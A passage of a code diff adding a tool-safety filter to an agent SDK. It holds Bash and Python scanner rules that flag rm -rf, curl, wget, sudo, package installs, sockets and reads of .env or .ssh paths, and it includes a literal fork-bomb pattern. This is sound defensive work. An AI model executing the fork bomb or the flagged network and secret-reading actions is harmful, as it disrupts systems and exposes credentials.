findings + + +class PipInstallRule(BashRule): + """Detect pip install calls.""" + + @property + def rule_id(self) -> str: + return "bash.pip_install" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + command = _install_command(line.tokens, {"pip", "pip3"}) or _python_module_pip_command(line.tokens) + if command and not policy.is_command_allowed(self.rule_id, command): + findings.append(self._finding("Bash code calls pip install.", line, policy, command)) + return findings + + +class NpmInstallRule(BashRule): + """Detect npm install calls.""" + + @property + def rule_id(self) -> str: + return "bash.npm_install" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + command = _install_command(line.tokens, {"npm"}) + if command and not policy.is_command_allowed(self.rule_id, command): + findings.append(self._finding("Bash code calls npm install.", line, policy, command)) + return findings + + +class BackgroundExecutionRule(BashRule): + """Detect background execution with &.""" + + @property + def rule_id(self) -> str: + return "bash.background_execution" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + if _has_background_operator(line.text): + findings.append(self._finding("Bash code uses background execution.", line, policy, "&")) + return findings + + +class ShellPipeRule(BashRule): + """Detect shell pipes.""" + + @property + def rule_id(self) -> str: + return "bash.shell_pipe" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + if _has_pipe_operator(line.text): + findings.append(self._finding("Bash code uses a shell pipe.", line, policy, "|")) + return findings + + +class ForkBombRule(BashRule): + """Detect common fork bomb patterns.""" + + @property + def rule_id(self) -> str: + return "bash.fork_bomb" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + if _is_fork_bomb(line.text): + findings.append( + self._finding("Bash code contains a fork bomb pattern.", line, policy, line.text.strip())) + return findings + + +class LongSleepRule(BashRule): + """Detect long sleep calls.""" + + @property + def rule_id(self) -> str: + return "bash.long_sleep" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + max_timeout = policy.rule_max_timeout(self.rule_id, _LONG_SLEEP_SECONDS) + for line in context.lines: + for index, token in enumerate(line.tokens): + if _command_name(token) != "sleep" or index + 1 >= len(line.tokens): + continue + seconds = _sleep_seconds(line.tokens[index + 1]) + if seconds >= max_timeout: + findings.append(self._finding("Bash code calls sleep for a long duration.", line, policy, "sleep")) + break + return findings + + +class BashScanner: + """Convenience scanner using the default Bash safety rules.""" + + def __init__(self, rules: Optional[list[Rule]] = None, policy: Optional[SafetyPolicy] = None): + self._checker = SafetyChecker(rules or create_bash_rules(), policy) + + async def scan(self, source: str, policy: Optional[SafetyPolicy] = None) -> SafetyResult: + """Scan Bash source and return a safety result.""" + request = ToolExecutionRequest(language="bash", script=source) + return await self._checker.check(request, policy) + + +def create_bash_rules() -> list[Rule]: + """Create the built-in Bash pattern safety rules.""" + return [ + RmRfRule(), + CurlRule(), + WgetRule(), + SudoRule(), + AptInstallRule(), + PipInstallRule(), + NpmInstallRule(), + BackgroundExecutionRule(), + ShellPipeRule(), + ForkBombRule(), + LongSleepRule(), + ] + + +def _extract_bash_source(request: ToolExecutionRequest) -> str: + language = (request.language or request.metadata.get("language") or "").strip().lower() + if language and language not in _BASH_LANGUAGES: + return "" + for value in ( + request.script, + request.args.get("code"), + request.args.get("script"), + request.metadata.get("code"), + request.metadata.get("script"), + request.metadata.get("bash_code"), + ): + if isinstance(value, str) and value.strip(): + return value + return "" + + +def _split_shell_tokens(line: str) -> list[str]: + lexer = shlex.shlex(line, posix=True, punctuation_chars=True) + lexer.whitespace_split = True + lexer.commenters = "#" + try: + return list(lexer) + except ValueError: + return line.split() + + +def _command_name(token: str) -> str: + return token.rsplit("/", 1)[-1] + + +def _command_findings( + rule: BashRule, + context: BashScanContext, + policy: SafetyPolicy, + names: set[str], + message: str, +) -> list[Finding]: + findings: list[Finding] = [] + for line in context.lines: + for token in line.tokens: + command = _command_name(token) + if command in names and not policy.is_command_allowed(rule.rule_id, command): + findings.append(rule._finding(message, line, policy, command)) + break + return findings + + +def _collect_short_flags(tokens: list[str]) -> set[str]: + flags: set[str] = set() + for token in tokens: + if token in {"|", "&", "&&", "||", ";"}: + break + if not token.startswith("-") or token == "-": + continue + flags.update(token.lstrip("-")) + return flags + + +def _install_command(tokens: list[str], command_names: set[str]) -> str: + for index, token in enumerate(tokens): + command = _command_name(token) + if command not in command_names: + continue + for candidate in tokens[index + 1:]: + if candidate in {"|", "&", "&&", "||", ";"}: + break + if candidate.startswith("-"): + continue + if candidate == "install": + return command + break + return "" + + +def _python_module_pip_command(tokens: list[str]) -> str: + for index, token in enumerate(tokens): + command = _command_name(token) + if command not in {"python", "python3"}: + continue + window = tokens[index + 1:index + 4] + if len(window) >= 3 and window[0] == "-m" and window[1] == "pip" and window[2] == "install": + return "pip" + return "" + + +def _has_background_operator(line: str) -> bool: + for index in _operator_positions(line, "&"): + before = line[index - 1] if index > 0 else "" + after = line[index + 1] if index + 1 < len(line) else "" + if before not in {"&", ">", "<"} and after != "&": + return True + return False + + +def _has_pipe_operator(line: str) -> bool: + for index in _operator_positions(line, "|"): + before = line[index - 1] if index > 0 else "" + after = line[index + 1] if index + 1 < len(line) else "" + if before != "|" and after != "|": + return True + return False + + +def _operator_positions(line: str, operator: str) -> list[int]: + positions: list[int] = [] + quote = "" + escaped = False + for index, char in enumerate(line): + if escaped: + escaped = False + continue + if char == "\\": + escaped = True + continue + if quote: + if char == quote: + quote = "" + continue + if char in {"'", '"'}: + quote = char + continue + if char == "#": + break + if char == operator: + positions.append(index) + return positions + + +def _is_fork_bomb(line: str) -> bool: + compact = "".join(line.split()) + if ":(){:|:&};:" in compact: + return True + return bool(re.search(r"([A-Za-z_:][A-Za-z0-9_:]*)\(\)\{\1\|\1&};\1", compact)) + + +def _sleep_seconds(value: str) -> float: + if value.lower() in {"inf", "infinity"}: + return inf + match = re.fullmatch(r"(\d+(?:\.\d+)?)([smhd]?)", value.lower()) + if not match: + return 0 + amount = float(match.group(1)) + unit = match.group(2) or "s" + scale = { + "s": 1, + "m": 60, + "h": 3600, + "d": 86400, + }[unit] + return amount * scale diff --git a/trpc_agent_sdk/tools/safety/checker.py b/trpc_agent_sdk/tools/safety/checker.py new file mode 100644 index 00000000..311b34a0 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/checker.py @@ -0,0 +1,88 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Checker framework for tool script safety checks.""" + +from __future__ import annotations + +from abc import ABC +from abc import abstractmethod +from typing import Iterable +from typing import List +from typing import Optional + +from .decision import DecisionEngine +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest +from .policy import PolicyLoader +from .policy import SafetyPolicy + + +class Rule(ABC): + """Abstract interface for a safety rule.""" + + @property + @abstractmethod + def rule_id(self) -> str: + """Unique rule identifier.""" + + @abstractmethod + async def check(self, request: ToolExecutionRequest, policy: SafetyPolicy) -> List[Finding]: + """Check a request and return findings.""" + + +class SafetyChecker: + """Run enabled safety rules and turn findings into a decision.""" + + def __init__( + self, + rules: Optional[Iterable[Rule]] = None, + policy: Optional[SafetyPolicy] = None, + decision_engine: Optional[DecisionEngine] = None, + ): + self._rules: list[Rule] = list(rules or []) + self._policy = policy or PolicyLoader.from_env() + self._decision_engine = decision_engine or DecisionEngine() + + @property + def rules(self) -> list[Rule]: + """Return registered rules.""" + return self._rules + + @property + def policy(self) -> SafetyPolicy: + """Return the default policy.""" + return self._policy + + @property + def decision_engine(self) -> DecisionEngine: + """Return the decision engine.""" + return self._decision_engine + + def add_rule(self, rule: Rule) -> None: + """Register one rule.""" + self._rules.append(rule) + + async def check( + self, + request: ToolExecutionRequest, + policy: Optional[SafetyPolicy] = None, + ) -> SafetyResult: + """Run enabled rules against a request.""" + active_policy = policy or self._policy + if not active_policy.enabled: + return SafetyResult(decision=SafetyDecision.ALLOW, request=request) + + findings: list[Finding] = [] + for rule in self._rules: + if not active_policy.is_rule_enabled(rule.rule_id): + continue + rule_findings = await rule.check(request, active_policy) + findings.extend(rule_findings or []) + + decision = self._decision_engine.decide(findings, active_policy) + return SafetyResult(decision=decision, findings=findings, request=request) diff --git a/trpc_agent_sdk/tools/safety/decision.py b/trpc_agent_sdk/tools/safety/decision.py new file mode 100644 index 00000000..ea3babbe --- /dev/null +++ b/trpc_agent_sdk/tools/safety/decision.py @@ -0,0 +1,40 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Decision engine for tool script safety findings.""" + +from __future__ import annotations + +from .models import Finding +from .models import SafetyDecision +from .models import SafetySeverity +from .policy import SafetyPolicy + + +class DecisionEngine: + """Turn safety findings into an execution decision.""" + + def decide(self, findings: list[Finding], policy: SafetyPolicy) -> SafetyDecision: + """Generate a decision from findings and policy thresholds.""" + if not findings: + return SafetyDecision.ALLOW + + deny_severities = set(policy.deny_severities or _default_deny_severities()) + if any(finding.severity in deny_severities for finding in findings): + return SafetyDecision.DENY + + review_severities = set(policy.review_severities or _default_review_severities()) + if any(finding.severity in review_severities for finding in findings): + return SafetyDecision.NEEDS_HUMAN_REVIEW + + return policy.default_decision + + +def _default_deny_severities() -> list[SafetySeverity]: + return [SafetySeverity.HIGH, SafetySeverity.CRITICAL] + + +def _default_review_severities() -> list[SafetySeverity]: + return [SafetySeverity.MEDIUM] diff --git a/trpc_agent_sdk/tools/safety/filter.py b/trpc_agent_sdk/tools/safety/filter.py new file mode 100644 index 00000000..7811ed86 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/filter.py @@ -0,0 +1,145 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool filter that applies safety checks before tool execution.""" + +from __future__ import annotations + +from typing import Any +from typing import Optional + +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk.context import AgentContext +from trpc_agent_sdk.context import get_invocation_ctx +from trpc_agent_sdk.filter import BaseFilter +from trpc_agent_sdk.filter import FilterType +from trpc_agent_sdk.tools._context_var import get_tool_var + +from .audit import SafetyAuditLogger +from .audit import monotonic_ms +from .bash_scanner import create_bash_rules +from .checker import SafetyChecker +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest +from .policy import SafetyPolicy +from .python_scanner import create_python_rules +from .report import SafetyReportWriter +from .telemetry import record_safety_attributes + +_SCRIPT_ARG_KEYS = ("script", "code", "command", "cmd", "python_code", "bash_code") +_LANGUAGE_ARG_KEYS = ("language", "lang") +_PYTHON_TOOL_HINTS = ("python", ) +_BASH_TOOL_HINTS = ("bash", "shell", "sh") + + +class ToolSafetyFilter(BaseFilter): + """Run the tool safety checker before executing a tool.""" + + def __init__( + self, + checker: Optional[SafetyChecker] = None, + policy: Optional[SafetyPolicy] = None, + audit_logger: Optional[SafetyAuditLogger] = None, + report_writer: Optional[SafetyReportWriter] = None, + ): + super().__init__() + self._type = FilterType.TOOL + self._name = "tool_safety" + self._checker = checker or SafetyChecker(rules=create_python_rules() + create_bash_rules(), policy=policy) + self._policy = policy + self._audit_logger = audit_logger or SafetyAuditLogger() + self._report_writer = report_writer or SafetyReportWriter() + + async def _before(self, ctx: AgentContext, req: Any, rsp: FilterResult): + """Run safety checks before the actual tool implementation.""" + request = _build_tool_execution_request(req) + start_ms = monotonic_ms() + result = await self._checker.check(request, self._policy) + self._audit_logger.write(result, monotonic_ms(start_ms)) + self._report_writer.write(result) + record_safety_attributes(result) + + if result.decision == SafetyDecision.ALLOW: + return + + rsp.rsp = _safety_response(result) + rsp.is_continue = False + rsp.error = None + + +def _build_tool_execution_request(args: Any) -> ToolExecutionRequest: + invocation_ctx = get_invocation_ctx() + tool = get_tool_var() + tool_name = getattr(tool, "name", "") + safe_args = args if isinstance(args, dict) else {} + language = _extract_language(tool_name, safe_args) + script = _extract_script(safe_args) + return ToolExecutionRequest( + tool_name=tool_name, + args=safe_args, + language=language, + script=script, + agent_name=getattr(invocation_ctx, "agent_name", ""), + invocation_id=getattr(invocation_ctx, "invocation_id", ""), + function_call_id=getattr(invocation_ctx, "function_call_id", "") or "", + metadata={ + "filter": "tool_safety", + }, + ) + + +def _extract_script(args: dict[str, Any]) -> str: + for key in _SCRIPT_ARG_KEYS: + value = args.get(key) + if isinstance(value, str) and value.strip(): + return value + return "" + + +def _extract_language(tool_name: str, args: dict[str, Any]) -> str: + for key in _LANGUAGE_ARG_KEYS: + value = args.get(key) + if isinstance(value, str) and value.strip(): + return value.strip().lower() + + lowered_tool_name = tool_name.lower() + if any(hint in lowered_tool_name for hint in _PYTHON_TOOL_HINTS): + return "python" + if any(hint in lowered_tool_name for hint in _BASH_TOOL_HINTS): + return "bash" + if isinstance(args.get("python_code"), str): + return "python" + if isinstance(args.get("bash_code"), str): + return "bash" + return "" + + +def _safety_response(result: SafetyResult) -> dict[str, Any]: + response = { + "status": "blocked" if result.decision == SafetyDecision.DENY else "needs_human_review", + "decision": result.decision.value, + "message": _decision_message(result), + "findings": [_finding_dict(finding) for finding in result.findings], + } + if result.decision == SafetyDecision.NEEDS_HUMAN_REVIEW: + response["human_review_required"] = True + return response + + +def _decision_message(result: SafetyResult) -> str: + if result.decision == SafetyDecision.DENY: + return "Tool execution was denied by the safety policy." + return "Tool execution requires human review before it can continue." + + +def _finding_dict(finding) -> dict[str, Any]: + return { + "rule_id": finding.rule_id, + "message": finding.message, + "severity": finding.severity.value, + "target": finding.target, + "metadata": finding.metadata, + } diff --git a/trpc_agent_sdk/tools/safety/models.py b/trpc_agent_sdk/tools/safety/models.py new file mode 100644 index 00000000..c329f781 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/models.py @@ -0,0 +1,72 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Data models for tool script safety checks.""" + +from __future__ import annotations + +from enum import Enum +from typing import Any +from typing import Dict +from typing import List +from typing import Optional + +from pydantic import BaseModel +from pydantic import Field + + +class SafetyDecision(str, Enum): + """Final decision from a safety check.""" + + ALLOW = "allow" + DENY = "deny" + NEEDS_HUMAN_REVIEW = "needs_human_review" + + +class SafetySeverity(str, Enum): + """Severity of a safety finding.""" + + INFO = "info" + LOW = "low" + MEDIUM = "medium" + HIGH = "high" + CRITICAL = "critical" + + +class ToolExecutionRequest(BaseModel): + """Input passed to safety rules before a tool execution.""" + + tool_name: str = Field(default="", description="Name of the tool being executed.") + args: Dict[str, Any] = Field(default_factory=dict, description="Tool arguments.") + language: str = Field(default="", description="Script language when known.") + script: str = Field(default="", description="Script source to scan when available.") + agent_name: str = Field(default="", description="Name of the current agent.") + invocation_id: str = Field(default="", description="Current invocation id.") + function_call_id: str = Field(default="", description="Current function call id.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Extension metadata.") + + +class Finding(BaseModel): + """A single issue reported by a safety rule.""" + + rule_id: str = Field(description="Identifier of the rule that produced this finding.") + message: str = Field(description="Human-readable finding message.") + severity: SafetySeverity = Field(default=SafetySeverity.MEDIUM, description="Finding severity.") + target: str = Field(default="", description="Optional target such as an argument path or code block id.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Rule-specific metadata.") + + +class SafetyResult(BaseModel): + """Result returned by the checker for one tool execution request.""" + + decision: SafetyDecision = Field(default=SafetyDecision.ALLOW, description="Final safety decision.") + findings: List[Finding] = Field(default_factory=list, description="Findings produced by enabled rules.") + request: Optional[ToolExecutionRequest] = Field(default=None, description="Request that was checked.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Checker-specific metadata.") + + @property + def allowed(self) -> bool: + """Return whether execution should continue.""" + return self.decision == SafetyDecision.ALLOW diff --git a/trpc_agent_sdk/tools/safety/policy.py b/trpc_agent_sdk/tools/safety/policy.py new file mode 100644 index 00000000..c36db503 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/policy.py @@ -0,0 +1,247 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Policy loading for tool script safety checks.""" + +from __future__ import annotations + +import json +import os +from pathlib import Path +from typing import Any +from typing import Dict +from typing import List +from typing import Optional +from urllib.parse import urlparse + +import yaml +from pydantic import BaseModel +from pydantic import Field + +from .models import SafetyDecision +from .models import SafetySeverity + +SAFETY_POLICY_ENV = "TRPC_AGENT_TOOL_SAFETY_POLICY" +DEFAULT_POLICY_FILE = Path(__file__).with_name("tool_safety_policy.yaml") + + +class SafetyPolicy(BaseModel): + """Configuration used by the safety checker.""" + + enabled: bool = Field(default=True, description="Whether safety checks are enabled.") + default_decision: SafetyDecision = Field( + default=SafetyDecision.ALLOW, + description="Decision used when findings do not match deny/review thresholds.", + ) + deny_severities: List[SafetySeverity] = Field( + default_factory=lambda: [SafetySeverity.HIGH, SafetySeverity.CRITICAL], + description="Finding severities that produce a deny decision.", + ) + review_severities: List[SafetySeverity] = Field( + default_factory=lambda: [SafetySeverity.MEDIUM], + description="Finding severities that require human review.", + ) + enabled_rules: List[str] = Field( + default_factory=list, + description="If set, only these rule ids are enabled.", + ) + disabled_rules: List[str] = Field(default_factory=list, description="Rule ids to disable.") + allowed_domains: List[str] = Field(default_factory=list, description="Domains allowed for network access rules.") + blocked_paths: List[str] = Field(default_factory=list, description="Paths blocked for filesystem rules.") + allowed_commands: List[str] = Field(default_factory=list, description="Commands allowed for command rules.") + max_timeout: Optional[float] = Field(default=None, description="Maximum allowed timeout in seconds.") + max_output_size: Optional[int] = Field(default=None, description="Maximum allowed output size in bytes.") + severity: Dict[str, Any] = Field(default_factory=dict, description="Default and per-rule severities.") + rule_configs: Dict[str, Dict[str, Any]] = Field(default_factory=dict, description="Per-rule configuration.") + metadata: Dict[str, Any] = Field(default_factory=dict, description="Extension metadata.") + + def is_rule_enabled(self, rule_id: str) -> bool: + """Return whether a rule should run under this policy.""" + if not self.enabled: + return False + if rule_id in self.disabled_rules: + return False + if self.enabled_rules and rule_id not in self.enabled_rules: + return False + return True + + def rule_config(self, rule_id: str) -> Dict[str, Any]: + """Return the configuration for one rule.""" + return self.rule_configs.get(rule_id, {}) + + def rule_value(self, rule_id: str, key: str, default: Any = None) -> Any: + """Return a per-rule value, falling back to the global policy value.""" + config = self.rule_config(rule_id) + if key in config: + return config[key] + return getattr(self, key, default) + + def rule_list(self, rule_id: str, key: str) -> List[str]: + """Return a string list from per-rule or global policy config.""" + return _as_string_list(self.rule_value(rule_id, key, [])) + + def rule_severity(self, rule_id: str, default: SafetySeverity = SafetySeverity.MEDIUM) -> SafetySeverity: + """Return the configured severity for one rule.""" + config = self.rule_config(rule_id) + value = config.get("severity") + if value is None: + value = self.severity.get(rule_id) or self.severity.get("default") + return _to_severity(value, default) + + def is_command_allowed(self, rule_id: str, command: str) -> bool: + """Return whether a command is explicitly allowed for a rule.""" + command = _normalize_command(command) + if not command: + return False + allowed_commands = self.rule_list(rule_id, "allowed_commands") + return any(_command_matches(command, allowed) for allowed in allowed_commands) + + def is_domain_allowed(self, rule_id: str, domain: str) -> bool: + """Return whether a domain is explicitly allowed for a rule.""" + domain = _normalize_domain(domain) + if not domain: + return False + allowed_domains = self.rule_list(rule_id, "allowed_domains") + return any(_domain_matches(domain, allowed) for allowed in allowed_domains) + + def is_path_blocked(self, rule_id: str, path: str) -> bool: + """Return whether a path is blocked for a rule.""" + if not path: + return False + blocked_paths = self.rule_list(rule_id, "blocked_paths") + return any(_path_matches(path, pattern) for pattern in blocked_paths) + + def rule_max_timeout(self, rule_id: str, default: float) -> float: + """Return the configured max timeout for one rule.""" + value = self.rule_value(rule_id, "max_timeout", default) + try: + return float(value) + except (TypeError, ValueError): + return default + + def rule_max_output_size(self, rule_id: str, default: Optional[int] = None) -> Optional[int]: + """Return the configured max output size for one rule.""" + value = self.rule_value(rule_id, "max_output_size", default) + if value is None: + return None + try: + return int(value) + except (TypeError, ValueError): + return default + + +class PolicyLoader: + """Load :class:`SafetyPolicy` from dictionaries, files, or environment.""" + + @staticmethod + def from_dict(data: Optional[Dict[str, Any]]) -> SafetyPolicy: + """Create a policy from a dictionary.""" + return SafetyPolicy.model_validate(_normalize_policy_data(data or {})) + + @staticmethod + def from_default_file() -> SafetyPolicy: + """Load the bundled default policy file.""" + if not DEFAULT_POLICY_FILE.exists(): + return SafetyPolicy() + return PolicyLoader.from_file(DEFAULT_POLICY_FILE) + + @staticmethod + def from_file(path: str | Path) -> SafetyPolicy: + """Load a policy from a JSON or YAML file.""" + policy_path = Path(path) + with policy_path.open("r", encoding="utf-8") as fp: + if policy_path.suffix.lower() in {".yaml", ".yml"}: + data = yaml.safe_load(fp) or {} + else: + data = json.load(fp) + return PolicyLoader.from_dict(data) + + @staticmethod + def from_env(env_var: str = SAFETY_POLICY_ENV) -> SafetyPolicy: + """Load a policy from an environment variable pointing to a policy file.""" + path = os.environ.get(env_var, "").strip() + if not path: + return PolicyLoader.from_default_file() + return PolicyLoader.from_file(path) + + +def _normalize_policy_data(data: Dict[str, Any]) -> Dict[str, Any]: + normalized = dict(data) + for key in ("deny_severities", "review_severities"): + if key in normalized: + normalized[key] = [_to_severity(value) for value in _as_list(normalized[key])] + return normalized + + +def _as_list(value: Any) -> list[Any]: + if value is None: + return [] + if isinstance(value, list): + return value + if isinstance(value, tuple): + return list(value) + if isinstance(value, set): + return list(value) + return [value] + + +def _as_string_list(value: Any) -> List[str]: + return [str(item) for item in _as_list(value) if str(item).strip()] + + +def _to_severity(value: Any, default: SafetySeverity = SafetySeverity.MEDIUM) -> SafetySeverity: + if isinstance(value, SafetySeverity): + return value + if isinstance(value, str): + try: + return SafetySeverity(value.lower()) + except ValueError: + return default + return default + + +def _normalize_command(command: str) -> str: + return command.strip().rsplit("/", 1)[-1] + + +def _command_matches(command: str, allowed: str) -> bool: + allowed = allowed.strip() + if allowed == "*": + return True + return command == _normalize_command(allowed) or command == allowed + + +def _normalize_domain(domain: str) -> str: + value = domain.strip().lower() + if "://" in value: + value = urlparse(value).hostname or "" + return value.strip(".") + + +def _domain_matches(domain: str, allowed: str) -> bool: + allowed_domain = _normalize_domain(allowed) + if allowed_domain == "*": + return True + return domain == allowed_domain or domain.endswith(f".{allowed_domain}") + + +def _path_matches(path: str, pattern: str) -> bool: + normalized_path = _normalize_path(path) + normalized_pattern = _normalize_path(pattern) + if normalized_pattern == "*": + return True + if not normalized_pattern: + return False + if normalized_pattern in {".env", ".ssh"}: + return normalized_pattern in _path_parts(normalized_path) + return normalized_path == normalized_pattern or normalized_path.startswith(f"{normalized_pattern.rstrip('/')}/") + + +def _normalize_path(path: str) -> str: + return path.strip().replace("\\", "/").rstrip("/") + + +def _path_parts(path: str) -> list[str]: + return [part for part in path.split("/") if part] diff --git a/trpc_agent_sdk/tools/safety/python_scanner.py b/trpc_agent_sdk/tools/safety/python_scanner.py new file mode 100644 index 00000000..bbc02b69 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/python_scanner.py @@ -0,0 +1,405 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""AST-based Python safety scanner rules.""" + +from __future__ import annotations + +import ast +from typing import List +from typing import Optional +from urllib.parse import urlparse + +from .checker import Rule +from .checker import SafetyChecker +from .models import Finding +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest +from .policy import SafetyPolicy + +_PYTHON_LANGUAGES = {"python", "py", "python3", "tool_code"} + + +class PythonScanContext: + """Parsed Python source plus lightweight symbol information.""" + + def __init__(self, source: str, tree: ast.AST): + self.source = source + self.tree = tree + self.aliases = self._collect_aliases(tree) + self.socket_vars = self._collect_socket_vars(tree) + + @classmethod + def create(cls, source: str) -> Optional["PythonScanContext"]: + """Parse Python source. Return None when source is not valid Python.""" + try: + tree = ast.parse(source) + except SyntaxError: + return None + return cls(source, tree) + + @staticmethod + def _collect_aliases(tree: ast.AST) -> dict[str, str]: + aliases: dict[str, str] = {} + for node in ast.walk(tree): + if isinstance(node, ast.Import): + for item in node.names: + if item.asname: + aliases[item.asname] = item.name + else: + local = item.name.split(".")[0] + aliases[local] = local + elif isinstance(node, ast.ImportFrom) and node.module: + for item in node.names: + local = item.asname or item.name + aliases[local] = f"{node.module}.{item.name}" + return aliases + + def _collect_socket_vars(self, tree: ast.AST) -> set[str]: + socket_vars: set[str] = set() + for node in ast.walk(tree): + value = None + targets: list[ast.expr] = [] + if isinstance(node, ast.Assign): + value = node.value + targets = list(node.targets) + elif isinstance(node, ast.AnnAssign): + value = node.value + targets = [node.target] + if value is None or not self._is_socket_constructor(value): + continue + for target in targets: + if isinstance(target, ast.Name): + socket_vars.add(target.id) + return socket_vars + + def _is_socket_constructor(self, node: ast.AST) -> bool: + if not isinstance(node, ast.Call): + return False + return self.resolve_call_name(node.func) in {"socket.socket"} + + def resolve_call_name(self, node: ast.AST) -> str: + """Resolve a simple dotted call name with import aliases.""" + if isinstance(node, ast.Name): + return self.aliases.get(node.id, node.id) + if isinstance(node, ast.Attribute): + base = self.resolve_call_name(node.value) + return f"{base}.{node.attr}" if base else node.attr + if isinstance(node, ast.Call): + return self.resolve_call_name(node.func) + return "" + + +class PythonAstRule(Rule): + """Base class for AST-backed Python rules.""" + + severity = SafetySeverity.HIGH + + async def check(self, request: ToolExecutionRequest, policy: SafetyPolicy) -> List[Finding]: + source = _extract_python_source(request) + if not source: + return [] + context = PythonScanContext.create(source) + if context is None: + return [] + return self.check_ast(context, policy) + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + """Check parsed Python source.""" + raise NotImplementedError + + def _finding(self, message: str, node: ast.AST, policy: SafetyPolicy, target: str = "") -> Finding: + return Finding( + rule_id=self.rule_id, + message=message, + severity=policy.rule_severity(self.rule_id, self.severity), + target=target, + metadata={ + "line": getattr(node, "lineno", 0), + "column": getattr(node, "col_offset", 0), + }, + ) + + +class PythonCallRule(PythonAstRule): + """Rule for matching fully-qualified call names.""" + + call_names: set[str] = set() + message = "Unsafe Python call detected." + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call): + continue + call_name = context.resolve_call_name(node.func) + if call_name in self.call_names and not policy.is_command_allowed(self.rule_id, call_name): + findings.append(self._finding(self.message, node, policy, call_name)) + return findings + + +class OsSystemRule(PythonCallRule): + """Detect os.system calls.""" + + @property + def rule_id(self) -> str: + return "python.os_system" + + call_names = {"os.system"} + message = "Python code calls os.system." + + +class SubprocessRunRule(PythonCallRule): + """Detect subprocess.run calls.""" + + @property + def rule_id(self) -> str: + return "python.subprocess_run" + + call_names = {"subprocess.run"} + message = "Python code calls subprocess.run." + + +class SubprocessPopenRule(PythonCallRule): + """Detect subprocess.Popen calls.""" + + @property + def rule_id(self) -> str: + return "python.subprocess_popen" + + call_names = {"subprocess.Popen"} + message = "Python code calls subprocess.Popen." + + +class ShutilRmtreeRule(PythonCallRule): + """Detect shutil.rmtree calls.""" + + @property + def rule_id(self) -> str: + return "python.shutil_rmtree" + + call_names = {"shutil.rmtree"} + message = "Python code calls shutil.rmtree." + + +class RequestsGetPostRule(PythonCallRule): + """Detect requests.get and requests.post calls.""" + + @property + def rule_id(self) -> str: + return "python.requests_get_post" + + call_names = {"requests.get", "requests.post"} + message = "Python code makes an HTTP request with requests.get/post." + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call): + continue + call_name = context.resolve_call_name(node.func) + if call_name not in self.call_names: + continue + domain = _domain_from_call(node) + if domain and policy.is_domain_allowed(self.rule_id, domain): + continue + findings.append(self._finding(self.message, node, policy, call_name)) + return findings + + +class SocketConnectRule(PythonAstRule): + """Detect socket connect calls.""" + + @property + def rule_id(self) -> str: + return "python.socket_connect" + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call): + continue + call_name = context.resolve_call_name(node.func) + is_direct_socket_call = call_name in {"socket.connect", "socket.socket.connect"} + if not (is_direct_socket_call or self._is_socket_var_connect(node.func, context)): + continue + domain = _domain_from_call(node) + if domain and policy.is_domain_allowed(self.rule_id, domain): + continue + findings.append(self._finding("Python code calls socket.connect.", node, policy, call_name or "connect")) + return findings + + @staticmethod + def _is_socket_var_connect(node: ast.AST, context: PythonScanContext) -> bool: + return (isinstance(node, ast.Attribute) and node.attr == "connect" and isinstance(node.value, ast.Name) + and node.value.id in context.socket_vars) + + +class PythonPathReadRule(PythonAstRule): + """Base class for file-read rules that match path literals.""" + + message = "Python code reads a sensitive path." + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call) or not _is_file_read_call(node, context): + continue + for path in _path_strings_from_read_call(node): + if self.path_matches(path, policy): + findings.append(self._finding(self.message, node, policy, path)) + return findings + + def path_matches(self, path: str, policy: SafetyPolicy) -> bool: + """Return whether a path literal should be reported.""" + raise NotImplementedError + + +class 